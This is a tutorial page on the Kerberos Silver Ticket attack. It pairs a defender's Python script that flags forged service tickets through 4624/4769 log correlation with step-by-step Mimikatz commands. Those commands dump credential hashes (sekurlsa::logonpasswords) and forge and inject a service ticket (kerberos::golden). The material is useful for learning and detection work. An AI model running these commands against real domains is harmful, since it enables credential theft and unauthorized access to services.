Silver Ticket
About The Attack
A Silver Ticket is a forged Kerberos service ticket (TGS) for a specific service.
- Unlike a Golden Ticket (which forges TGTs and gives domain-wide access), a Silver Ticket only works for one service on one machine.
- But it’s much stealthier because it doesn’t involve the Domain Controller (DC) at all. Once you forge the ticket, authentication happens directly between you and the target service.
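Because the service host checks a ticket with its own service account key and (unless PAC validation is enabled) never asks the KDC, a forged service ticket leaves no 4769 TGS request on the Domain Controller; the only trace is the 4624 logon on the target host. The following Python script is an added example written for this page from a defender's perspective, not part of the original notes: it correlates Kerberos network logons (4624, logon type 3) from a service host with TGS requests (4769) logged on the DC and flags logons that have no matching request. The sample events, the host name web.domain.com, the service account name websvc and the ten-minute window are constructed assumptions; the secondary check on the domain field (a forged ticket commonly carries the DNS domain name where a genuine one carries the NetBIOS name) is a heuristic, not a guarantee.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs), normalised the way a SIEM
# might present them. The first logon has a matching DC request; the
# second, as with a forged service ticket, does not.
HOST_LOGONS = [
    {"time": "2024-05-01T10:00:05", "event_id": 4624, "host": "web.domain.com",
     "logon_type": 3, "auth_package": "Kerberos", "user": "alice",
     "user_domain": "DOMAIN", "src_ip": "10.0.0.15"},
    {"time": "2024-05-01T10:07:30", "event_id": 4624, "host": "web.domain.com",
     "logon_type": 3, "auth_package": "Kerberos", "user": "UserName",
     "user_domain": "domain.com", "src_ip": "10.0.0.99"},
]
DC_TGS_REQUESTS = [
    {"time": "2024-05-01T10:00:02", "event_id": 4769, "user": "alice",
     "service": "websvc", "src_ip": "10.0.0.15"},
]

NETBIOS_DOMAIN = "DOMAIN"                       # assumed NetBIOS domain name
SERVICE_ACCOUNTS = {"web.domain.com": "websvc"}  # assumed host -> account owning its SPNs
WINDOW = timedelta(minutes=10)                   # assumed max gap between 4769 and 4624


def _ts(value):
    return datetime.fromisoformat(value)


def find_suspicious_logons(host_logons, dc_tgs_requests, window=WINDOW):
    """Return Kerberos network logons that lack a preceding 4769 on the DC,
    or whose domain field does not look like a KDC-issued ticket."""
    findings = []
    for ev in host_logons:
        if (ev["event_id"] != 4624 or ev["auth_package"] != "Kerberos"
                or ev["logon_type"] != 3):
            continue
        svc_account = SERVICE_ACCOUNTS.get(ev["host"], "")
        logon_time = _ts(ev["time"])
        # A legitimate service logon is preceded by a TGS request on the DC
        # for the same user and the account that owns the host's SPN.
        matched = any(
            r["event_id"] == 4769
            and r["user"].lower() == ev["user"].lower()
            and r["service"].lower() == svc_account.lower()
            and logon_time - window <= _ts(r["time"]) <= logon_time
            for r in dc_tgs_requests
        )
        reasons = []
        if not matched:
            reasons.append("no 4769 TGS request on the DC for this user/service in the window")
        if ev["user_domain"] != NETBIOS_DOMAIN:
            reasons.append(f"domain field {ev['user_domain']!r} is not the NetBIOS name {NETBIOS_DOMAIN!r}")
        if reasons:
            findings.append({"time": ev["time"], "host": ev["host"], "user": ev["user"],
                             "src_ip": ev["src_ip"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_logons(HOST_LOGONS, DC_TGS_REQUESTS):
        print(finding)
```

The correlation depends on collecting 4769 from every DC and 4624 from the service hosts into the same store with synchronised clocks; a missing DC feed produces the same "no 4769" signal as a forged ticket. Because the ticket is encrypted with the service account's password hash, rotating that password (or moving the service to a group managed service account, which rotates it automatically) invalidates any ticket forged with the old hash.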
Prerequisites
We need the following information to perform the attack:
- Password hash (NTLM/RC4) of the service account that owns the target SPN
- Domain SID
- Target SPN (service type and host)
- Privileged access to a domain machine
How to perform the attack
Extract Hash
We need the password hash of the service account behind the SPN for which we want to create the Silver Ticket.
privilege::debug
sekurlsa::logonpasswords
From the output of the above commands we can select the service account and its hash.
Fetch SID
We need the Domain SID for the silver ticket; from the SID returned by the command below, drop the user's RID (the final component).
whoami /user
Use Mimikatz
Now use mimikatz to forge a silver ticket for the service; the command below targets a web service (HTTP SPN).
kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:domain.com /ptt /target:web.domain.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:UserName
Verify Ticket
We can use PowerShell to verify that the ticket has been added to the current session's ticket cache.
klist